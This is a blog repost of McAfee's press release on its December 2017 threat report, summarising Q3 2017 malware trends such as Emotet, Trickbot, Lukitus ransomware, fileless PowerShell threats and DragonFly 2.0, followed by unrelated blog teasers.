Skip to main content

McAfee Labs Report Sees Known Exploits and Fileless Malware Drive Record New Malware Surge

McAfee has released its McAfee Labs Threat Report: December 2017, examining the growth and trends of new malware, ransomware, and other threats in Q3 2017.

McAfee Labs saw malware reach an all-time high of 57.6 million new samples—four new samples per second—featuring developments such as new fileless malware using malicious macros, a new version of Locky ransomware dubbed Lukitus, and new variations of the banking Trojans Trickbot and Emotet. Threats attempting to exploit Microsoft technology vulnerabilities were very prominent despite the fact that the platform vendor addressed these issues with patches as early as the first quarter of 2017.

“The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist. “Although attackers will always seek ways to use newly developed innovations and established platforms against us, our industry perhaps faces a greater challenge in the effort to influence individuals and organizations away from becoming their own worst enemies.”

Each quarter, McAfee Labs assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Intelligence complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Known Vulnerabilities Exploited

The third quarter of 2017 saw cybercriminals continue to take advantage of Microsoft Office vulnerabilities such as CVE-2017-0199, which took advantage of a vulnerability within both Microsoft Office and WordPad to allow remote code execution through specially crafted files. To execute this attack, many took advantage of a tool available via GitHub offering an easy route to creating a backdoor attack without complex configuration.

New variations of the Trickbot banking Trojan featured code that embedded the EternalBlue exploit responsible for the massive WannaCry and NotPetya ransomware outbreaks in Q2. Despite Microsoft’s continued efforts to counter EternalBlue with security patches, the new Trickbot authors still found the proven technique to be effective. They combined it with new features such as cryptocurrency theft and new delivery methods, and made these new Trickbot versions the most active banking Trojans in Q3.

“Once vulnerabilities are discovered and disclosed ‘into the wild,’ or the hacker community, they present a blueprint for malicious parties seeking to develop sophisticated threats that exploit them,” said Steve Grobman, Chief Technology Officer at McAfee. “The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax. Only by investing more in the discovery and remediation of cyber vulnerabilities can technology vendors, governments, and business enterprises hope to gain a step on the cybercriminals working furiously to uncover and take advantage of them.”

Fileless Threats

Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%. Very prominent in this category was the Emotet banking Trojan, which spread around the world through large spamming campaigns, and lured users into downloading Microsoft Word documents. This act inadvertently activates a PowerShell macro that downloads and installs the malware on their systems.

“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”

Lukitus Ransomware

One of the key developments in the ransomware space was the emergence of Lukitus, a new version of Locky ransomware. The ransomware was distributed by more than 23 million spam emails within the first 24 hours of the attack. Overall in the category, new ransomware samples increased by 36%. The number of total ransomware samples has grown 44% in the past four quarters to 12.3 million samples.

DragonFly: New Industries, New Objectives

The McAfee Advanced Threat Research team found that DragonFly 2.0, the malware discovered earlier in 2017 in the energy sector, has targeted organizations beyond original discoveries, including the pharmaceutical, financial services, and accounting industries. These attacks were initiated through spear-phishing emails, luring recipients to click on links that download the Trojan and provide attackers with network access. 

“The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer. “The intellectual property and insider insights they obtain upon gaining access to targeted sectors is of tremendous economic value.”

Q3 2017 Threat Activity

Security incidents. McAfee Labs counted 263 publicly disclosed security incidents in Q3, a decrease of 15% from Q2. More than 60% of all publicly disclosed security incidents in Q3 took place in the Americas.

Vertical industry targets. The health and public sectors accounted for more than 40% of total incidents in Q3.

North America. Health sector attacks continued to lead vertical sectors in Q3 security incidents.  
Asia. Public sector, followed by technology and individual attacks led in reported Q3 incidents.
Europe, Oceana and Africa. Public sector attacks led reported Q3 incidents. 
Attack vectors. Account hijacking led disclosed attack vectors, followed by leaks, malware, DDoS, and targeted attacks.

Mobile malware. Total mobile malware continued to grow, reaching 21.1 million samples. New mobile malware increased by 60% from Q2, largely due to a rapid increase in Android screen-locking ransomware.

Malware overall. New malware samples increased in Q3 to 57.5 million, a 10% increase. The total number of malware samples grew 27% in the past four quarters to almost 781 million samples.

Fileless malware. While JavaScript malware growth slowed by 26% in Q3, PowerShell malware more than doubled with 119%.

Ransomware. New ransomware samples rose by 36% in Q3. The total number of new ransomware samples grew 14% in the last quarter to 12.2 million samples.

Mac malware. Mac OS malware samples increased by 7% in Q3.

Macro malware. Total macro malware continued to grow, increasing by 8% in Q3.

Spam campaigns. The Gamut botnet remains the most prevalent spamming botnet during Q3, with the Necurs botnet a close second. Necurs proliferated several Ykcol (Locky) ransomware campaigns throughout the quarter with themese such as “Status Invoice,” “Your Payment,” and “Emailing: [Random Numbers] JPG.”

Popular posts from this blog

Cloud Computing powering India’s priority of ‘Digital-first country’

By: Sunil Mahale, India MD and VP, Nutanix
Digital transformation has been recognized as being vital to the growth of our nation. This transformation has enjoyed the unanimous approval and contribution from all stake holders including enterprises, MSMEs, government bodies and citizens. But this level of adoption in a country with a population of over a billion people would need a robust technology base that is capable to collecting and distributing vital data seamlessly.
Digital India envisions creating high speed digital highways, that will impact commerce and create a digital footprint for every individual. Technologies based on mobility, analytics, Internet of things and most importantly, cloud technologies are the building blocks for the digital India missionThere is a growing need to manage huge volumes of data, and making them readily available to public through digital cloud services. Cloud has a pivotal role in enabling this change.
While Data centers have become crucial to th…

Semalt Expert Tells The Reasons Qualitative SEO Services Are Not Cheap

Just like the internet, Search Engine Optimization is constantly changing. Also, it's becoming more difficult to perform a good SEO as soon as Google is continuously improving the algorithm of ranking websites. SEO becomes more complicated so you should expect to pay more for hiring SEO specialists or agencies.
The leading Customer Success Manager of Semalt, Igor Gamanenko explains what factors force SEO services cost increase.
SEO Expertise
SEO has been undergoing the crucial changes and updates over the last 10 years. In the early days of SEO, Google only was caring about the technical aspect of your website, links and keyword metadata to rate you higher. The rating guidelines were quite easy: all you had to do was using some keywords in your metadata and more links than your competitors. This was enough to give you a higher ranking in search engines.
Today, the game has completely changed. Through semantics, Google has a better understanding of internet searches, so it can judg…

RevStart launches its RevItUp Incubation Programme

Underlining its vision of creating a nurturing ecosystem for start-ups to grow in, RevStart, a co-working and incubation centre, has announced the launch of its RevItUp Incubation Programme. The 12-week long programme will be held at RevStart Incubation Centre in Noida from July 1, 2018 onwards. As part of the programme, RevStart will select five high potential start-ups from the ed-tech sector, AI, Consumer Internet, Sustainability, as well as for-profit social impact companies to assist them with developing their business, along with connecting them to global mentors across industries and sectors. In addition, start-ups selected for the programme will receive INR 5 lakh to Rs. 25 lakhs worth of cash and benefits, while RevStart will get an equity stake in the ventures.
The RevItUp Incubation Programme has been created to enhance the founding team’s industry, product, and company building knowledge and capabilities through a world-class curriculum. The programme will focus on tailor…